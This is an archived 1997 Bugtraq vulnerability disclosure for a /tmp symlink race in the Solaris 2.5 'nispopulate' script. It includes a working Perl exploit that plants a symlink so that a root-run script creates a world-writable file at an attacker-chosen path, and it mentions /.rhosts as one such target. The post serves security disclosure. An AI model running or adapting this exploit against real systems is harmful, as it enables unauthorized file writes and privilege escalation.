Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Solaris 2.5 'nispopulate' vulnerability

From: runeb () td org uit no (Rune Braathen)
Date: Fri, 7 Mar 1997 17:45:52 +0100

(If this is old news, please ignore).

Platform: Solaris 2.5
Problem: bad /tmp file creation
Impact: write files anywhere in the filesystem with mode 777

The script '/usr/lib/nis/nispopulate' creates files with modebits 777 in
/tmp. The files gleefully follow symlinks to where ever you like them to.

In an attempt to make the names unpredictable, the filenames are postfixed
with the process-id and a number from 0-4. However, the script does the
following:

1. creates files /tmp/sh<PID>[0-4] w/permission 666
2. waits for user input
3. creates file /tmp/passwd_<PID> w/permission 777

A malicious program monitoring the /tmp directory for filenames
'sh<PID>[0-4]' can snip out the PID and insert a symlink at
/tmp/passwd_<PID> before it is created in step 3.

'nispopulate' is used for migrating /etc-files or NIS-maps into
NIS+-tables. It is run only once during the setup of a NIS+ server. So, no
need to be alarmed. I'm not too sure about the rest of '/usr/lib/nis/*',
but all of the scripts seem rather crummy as far as /tmp and
filepermissions go.

The attached perlscript sits waiting for /tmp/sh*' files to be created.
When they are, a symlink to $destfile is placed in /tmp, in this case
/hello.world. It could of course be /.rhosts, /usr/bin/.rhosts or
whatever.

NB! The exploit works only when you run 'nispopulate'.  The other
'/usr/lib/nis/*' scripts will have no effect. This has the pleasing effect
of preventing someone from starting the exploit and start hassling their
admin to intall nis+. :)

To test:

---------------------------------- clip --------------------------------

#!/opt/gnu/bin/perl

# nisplus-exploit.pl
#
# to test: 1) start the script   2) as root, run /usr/lib/nispopulate
# Demonstrates weakness in Solaris 2.5 /usr/lib/nis/nispopulate
# shell script, by inserting a symlink postfixed with pid
#
#                                     - runeb () td org uit no

$destfile = "/hello.world";

do {
    opendir(TMP, "/tmp");
    while ($f = readdir(TMP)) {
        if (substr($f, 0, 2) eq "sh") {
            symlink($destfile, "/tmp/passwd_" . substr($f,2,length($f)-3));
            $quit=1; last;
        }
    }
    closedir(TMP);
    sleep(1);
} while $quit == 0;



--
__________________________________________________________________
runeb / cF - runeb () td org uit no - http://www.td.org.uit.no/~runeb
a new life awaits you, in the off-world colonies.
Previous By Date Next
Previous By Thread Next

Current thread: